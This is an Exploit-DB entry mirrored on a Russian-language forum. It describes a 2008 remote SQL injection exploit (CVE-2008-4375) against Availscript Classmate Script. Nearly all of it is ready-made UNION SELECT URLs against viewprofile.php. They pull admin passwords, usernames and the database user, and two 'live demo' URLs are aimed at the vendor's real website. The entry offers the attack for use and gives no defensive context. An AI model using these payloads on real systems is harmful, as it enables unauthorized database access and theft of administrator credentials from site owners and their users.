- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6412
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4375
- Дата публикации
- 2008-09-09
Код:
Availscript Classmate Script Remote SQL Injection Vulnerability
home script : http://www.availscript.com/classmate_script.php
By : Stack
befor execute exploit you need to register
exploit
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
live demo
username
http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
# milw0rm.com [2008-09-09]- Источник
- www.exploit-db.com
